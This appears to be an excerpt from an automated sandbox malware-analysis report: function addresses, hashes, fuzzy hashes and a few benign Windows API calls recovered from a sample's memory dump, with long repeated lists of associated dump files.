Opcode ID: 4be462c4cd99baf40c2413fee2ed4959c55384daa18048c1271a5a6a1eea3d2f
Instruction ID: e42d30aa7e704b29275c113b29d569d08d9afb3e3cec15c130a3963b5bdce38a
Opcode Fuzzy Hash: 4be462c4cd99baf40c2413fee2ed4959c55384daa18048c1271a5a6a1eea3d2f
Instruction Fuzzy Hash: 8951E831608205CFD714DF6AE68199AF3F5FF98314B24826BD804C7761D6B8EDA2CB49

Function 0049BCE0 Relevance: 1.7, Strings: 1, Instructions: 416COMMON

Download Yara Rule

Strings

tion, xrefs: 0049C218, 0049C34A

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID: tion
API String ID: 0-3396346703
Opcode ID: 0a9f215d3aff7569d6796b459a2064d2f6ebfe625bc231362a5bd24e4ef54067
Instruction ID: e9510da882d2522e22ef6cb1aca41a245af549924453b9798f927f0dc5df4def
Opcode Fuzzy Hash: 0a9f215d3aff7569d6796b459a2064d2f6ebfe625bc231362a5bd24e4ef54067
Instruction Fuzzy Hash: 9712E870A44148DFDB04DB59C685FADBBF2EF44304F2941E6E8449B366C378AE90DB58

Function 0042EC14 Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042EC77

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 0a9c29bd7de3affe079ecb9229a7b9af00499bb16aa2ed26139e4ebb73d0e329
Instruction ID: cf8f81b6326f4df68cc9286bac37aa0c9f8b7efcb27e1d46e5cf5cf90d5d3c9c
Opcode Fuzzy Hash: 0a9c29bd7de3affe079ecb9229a7b9af00499bb16aa2ed26139e4ebb73d0e329
Instruction Fuzzy Hash: 20F06DB6704214AF9B04DFABE99189AB7ECEB4A72076144B6F908D7641D275AC008B64

Function 0040787C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040789A

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d6fbbe84f13e5e920c42eb576029e3dad123ca09e4cc5a996e286098105d0564
Instruction ID: 884fb23cc0654e0d9c900b0b87d5646cf80b9292e25ec96c586b743f3f97cba5
Opcode Fuzzy Hash: d6fbbe84f13e5e920c42eb576029e3dad123ca09e4cc5a996e286098105d0564
Instruction Fuzzy Hash: DBE0D872B0421417D711A9694C86AF7B25C9758315F00817FB904E73C6EEB8AE4487EE

Function 00426438 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00426462

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: accdde3b04040e773455d48e539acd12ca2134d63b8074dfb30932199542b503
Instruction ID: 4c91ddf700dfe692448665e4832e0da3a74cd8fa768faf2881e95830cdb3bdb2
Opcode Fuzzy Hash: accdde3b04040e773455d48e539acd12ca2134d63b8074dfb30932199542b503
Instruction Fuzzy Hash: 0CF0C5B9205608AFCB40DF9DC588D4AFBE8FB4C260B058695BD88CB321C234FD808F94

Function 004078C8 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00407ACA,00000000,00407C7C,?,?,?,?,00000000), ref: 004078DB

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: eb31bcee987f62c0ec41f0c2a1383e3a1ea3dc753b1c509fa0889bedbde72a2d
Instruction ID: 0b7572e87f081b2135604ceaaf2b7536c95025b52d41d54e58323ddda4b21ce8
Opcode Fuzzy Hash: eb31bcee987f62c0ec41f0c2a1383e3a1ea3dc753b1c509fa0889bedbde72a2d
Instruction Fuzzy Hash: 00D05EA770D2507AE210619B2D89DBB5A9CCAC57A4F10803BF648D6242D3249C06E376

Function 004310C8 Relevance: 1.5, APIs: 1, Instructions: 21clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 004310F6

Part of subcall function 00421DC4: GetClassInfoA.USER32(00400000,00421DB4,?), ref: 00421DE5
Part of subcall function 00421DC4: UnregisterClassA.USER32(00421DB4,00400000), ref: 00421E0E
Part of subcall function 00421DC4: RegisterClassA.USER32(0049E5BC), ref: 00421E18
Part of subcall function 00421DC4: SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 00421E53

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Class$ClipboardInfoLongOpenRegisterUnregisterWindow
String ID:
API String ID: 1124429816-0
Opcode ID: 82cadfcdeeb8b55f8ac745a6e363de3c4e888026ca8423a6380a8e99c11fedbc
Instruction ID: 0ab7c2fb470f2d5136ad43665e1558ed9f6d9b4caf57a82adfa28b7835d09097
Opcode Fuzzy Hash: 82cadfcdeeb8b55f8ac745a6e363de3c4e888026ca8423a6380a8e99c11fedbc
Instruction Fuzzy Hash: 49E075B4601291CEDF00DF69C4C5B51BBE4AB1C319F58D4A6E8088F257D779D880CB24

Function 004082FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00408BF8,00000000,00408C06), ref: 0040830A

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 09ff3e2213c9c8faee719d029efcd8129d85478943946e9fd50c745c11c746d9
Instruction ID: 27260fcf230433da495d93cd1dd700899418a5624c62593eadf69b50294382d2
Opcode Fuzzy Hash: 09ff3e2213c9c8faee719d029efcd8129d85478943946e9fd50c745c11c746d9
Instruction Fuzzy Hash: 7BC012A04003428AE7109B218C02B1A32D46B80710F880A3AA9E8D23C2EB7E8022865A

Function 00450D04 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

ticalSection, xrefs: 00450E10, 00450E1C, 00450E56, 00450E6E, 00450F21

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: EnableItemLoadMenuString
String ID: ticalSection
API String ID: 1799147550-4264482612
Opcode ID: 582f0c5d026aa085a73eaa666fb5073f830b8d0b2ae8c4c90e2da80e246e7b6c
Instruction ID: df893811f045c580a0b1b5a6be69bae551ca1cf9b8f8e767bfcf1533946e7948
Opcode Fuzzy Hash: 582f0c5d026aa085a73eaa666fb5073f830b8d0b2ae8c4c90e2da80e246e7b6c
Instruction Fuzzy Hash: 71511134600A09DBDB40FF7AD8C1ACD77A2AF84318F5451B6FC188F26BCA756C858B18

Function 0045FC18 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

ticalSection, xrefs: 0045FD24, 0045FD30, 0045FD6A, 0045FD82, 0045FE35

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: EnableItemLoadMenuString
String ID: ticalSection
API String ID: 1799147550-4264482612
Opcode ID: c8dfc59b537c958254fbfdc56f8225f0aeb08a47509bf04a48ababa5000cb2a4
Instruction ID: 59a21ae3e9e052b14689dc6df16ded3427bb0d6131d4a6c0819c2934045ea9c6
Opcode Fuzzy Hash: c8dfc59b537c958254fbfdc56f8225f0aeb08a47509bf04a48ababa5000cb2a4
Instruction Fuzzy Hash: AB51F030600908DBDB40FF7AD8C5ADD77A2AF94348F5451B6FC188F267CA796D458B28

Function 00455528 Relevance: .6, Instructions: 552COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd153aa3dc0730b8e2e029b60558d7762750bf19033d9f739beb31c4841ae48
Instruction ID: 64043a1a456da739258e086f3e9a61efc04bf5809b98d4c381c7accf03036a35
Opcode Fuzzy Hash: 8fd153aa3dc0730b8e2e029b60558d7762750bf19033d9f739beb31c4841ae48
Instruction Fuzzy Hash: 9212F670710A03DBDB2D8D7CE5A837E7791A704306F14597ADC46CE28BDA28D8C9CB99

Function 0042E99C Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f7ad31701c1a9a840d62a6e47d4eacd685c432b63daf4f0cc493e10a4b5eab1
Instruction ID: 8ee20b92d968b6edde9c4807ff06b4bac632754ca13da263488667f892f791c3
Opcode Fuzzy Hash: 3f7ad31701c1a9a840d62a6e47d4eacd685c432b63daf4f0cc493e10a4b5eab1
Instruction Fuzzy Hash: 3C51DB71B00109EFDB44DBAAD991E9EB7F9EF48300FA081AAE505D7352DA34FE419B14

Function 0046BDCE Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
